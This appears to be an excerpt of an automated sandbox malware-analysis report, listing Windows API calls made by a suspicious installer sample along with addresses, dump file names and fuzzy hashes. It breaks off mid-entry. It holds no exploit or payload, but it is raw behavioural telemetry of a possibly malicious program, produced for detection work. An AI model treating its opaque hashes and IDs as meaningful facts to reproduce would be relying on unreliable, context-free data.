                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2111968516-0
                                                                                                                                                              • Opcode ID: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                                                                                                                              • Instruction ID: 7f5a5d1368c13d317d2e99ee4d98356b480ceadea176dd08c5889da6900fd1c4
                                                                                                                                                              • Opcode Fuzzy Hash: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                                                                                                                              • Instruction Fuzzy Hash: 7E21B730D04299FADF328BA885886AEBB749F11314F1440BFE491B73D1C2BD8A85DB19
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                                                                                                                                • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FilePointerwsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 327478801-0
                                                                                                                                                              • Opcode ID: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                                                                                                                              • Instruction ID: d2cb0ca5e863be2ef59b536234997f243a65a7806d73518010ac019a9530af38
                                                                                                                                                              • Opcode Fuzzy Hash: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                                                                                                                              • Instruction Fuzzy Hash: 7EE09271B00114EED711FBA4AE49DBF77B8EB40315B10403BF102F10C1CABC49128A2E
                                                                                                                                                              APIs
                                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 390214022-0
                                                                                                                                                              • Opcode ID: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                                                                                                                              • Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
                                                                                                                                                              • Opcode Fuzzy Hash: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                                                                                                                              • Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
                                                                                                                                                              APIs
                                                                                                                                                              • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PathSearch
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2203818243-0
                                                                                                                                                              • Opcode ID: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                                                                                                                              • Instruction ID: 99b882ef8ac932529d6fdfe3c41faefb6a71927cb26e20fd81cb329c01224dc0
                                                                                                                                                              • Opcode Fuzzy Hash: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                                                                                                                              • Instruction Fuzzy Hash: 93E0DF72304210EFD710DF649E49BAB37A8DF10368B20427AE111A60C2E6F89906873D
                                                                                                                                                              APIs
                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Create
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                              • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                                                                                              • Instruction ID: 8c71f3c26dc4a4bf3eef9e60a583d004d00a96479e721722a8f6be6a9d57506c
                                                                                                                                                              • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                                                                                              • Instruction Fuzzy Hash: 1CE0E6B201450ABEDF095F50DD0ED7B3B1DE704300F14452EF906D4050E6B5A9205A34
                                                                                                                                                              APIs
                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                              • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                                                                                                              • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                                                                                                                              • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                                                                                                              • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                                                                                                                              APIs
                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                              • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                                                                                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                              • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                                                                                                                              APIs
                                                                                                                                                              • VirtualProtect.KERNELBASE(6F95404C,00000004,00000040,6F95403C), ref: 6F95293F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2314184359.000000006F951000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F950000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2314019695.000000006F950000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314334219.000000006F953000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2314455683.000000006F955000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_6f950000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                              • Opcode ID: c205d47e673efbdd05db3b10042fdb96e8f65c97aac00ac318f4fa4ced38b37e
                                                                                                                                                              • Instruction ID: 55ccef2797b939555da6e4242ff945f3658e1b3c99f8de081dd62cff60f382a7
                                                                                                                                                              • Opcode Fuzzy Hash: c205d47e673efbdd05db3b10042fdb96e8f65c97aac00ac318f4fa4ced38b37e
                                                                                                                                                              • Instruction Fuzzy Hash: 32F01FB150CB80DEEBE0CF7C8465A163AF0B75A275B21456AE258E6281E374907C9F51
                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040600B,?,?,?,?,00000002,Call), ref: 00405FA1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                              • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                                                                              • Instruction ID: 8d979316dbb681ef417a562383420c35b8ea1d7cbf1ba97b3ef1f912197d15a8
                                                                                                                                                              • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                                                                                              • Instruction Fuzzy Hash: 26D0EC7200460ABBDF115E90DD05FAB3B1DEB08310F044426FA05E5091D679D530AA25
                                                                                                                                                              APIs
                                                                                                                                                              • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                              • Opcode ID: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                                                                                                                              • Instruction ID: 936ed37629fa473271aaed7dd48578ad272974d6d3f069640798472dc64bc079
                                                                                                                                                              • Opcode Fuzzy Hash: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                                                                                                                              • Instruction Fuzzy Hash: F6D01232704115DBDB10EFA59B08A9E73B5EB10325B308277E111F21D1E6B9C9469A2D
                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(0001042A,00000000,00000000,00000000), ref: 004041D9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              • Opcode ID: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
                                                                                                                                                              • Instruction ID: 4f5bfb943ccb7372f266285400f959559a3f08b639bcfa815988f1d16fb7a589
                                                                                                                                                              • Opcode Fuzzy Hash: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
                                                                                                                                                              • Instruction Fuzzy Hash: A5C09BB17447017FEE20CB659D49F0777586750700F2544397755F60D4C674E461D61C
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                              • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                                              • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                                                                                                              • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                                              • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(00000028,?,?,00403FE0), ref: 004041BE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                              • Opcode ID: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
                                                                                                                                                              • Instruction ID: 1318e1a831b13f4a694e23e2858010ee9933afb9cbbae162fbad06e3603bfc21
                                                                                                                                                              • Opcode Fuzzy Hash: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
                                                                                                                                                              • Instruction Fuzzy Hash: A9B09236284A00ABDA215B50DE09F4A7A72A768701F408039B240250B0CAB200A5EB18
                                                                                                                                                              APIs
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00403F79), ref: 004041A7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                              • Opcode ID: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
                                                                                                                                                              • Instruction ID: f9921b4c88a1a0ed6e9c6eedf741b01f94502565facb500019f25752580a62db
                                                                                                                                                              • Opcode Fuzzy Hash: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
                                                                                                                                                              • Instruction Fuzzy Hash: C5A011B2000000AFCB02AB00EF08C0ABBA2ABA0300B008838A280800388B320832EB0A
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                                                                                                • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                                                                                                • Part of subcall function 0040521E: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00403233,00403233,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,00000000,00424248,74DF23A0), ref: 0040527A
                                                                                                                                                                • Part of subcall function 0040521E: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh3B4E.tmp\System.dll), ref: 0040528C
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                                                                                                • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                                                                                                • Part of subcall function 00405796: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                                                                                                                                • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?), ref: 00401FC0
                                                                                                                                                                • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                                                                                                                                • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                                                                                                                                • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.2276794316.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.2276781301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276807198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276819766.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.2276866748.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2972824698-0
                                                                                                                                                              • Opcode ID: 315cc39806da668a4107bf616721638a3cd66a00c9e37737a17bc4b7e9302141
                                                                                                                                                              • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                                                                                                                              • Opcode Fuzzy Hash: 315cc39806da668a4107bf616721638a3cd66a00c9e37737a17bc4b7e9302141
                                                                                                                                                              • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                                                                                                              Memory Dump Source
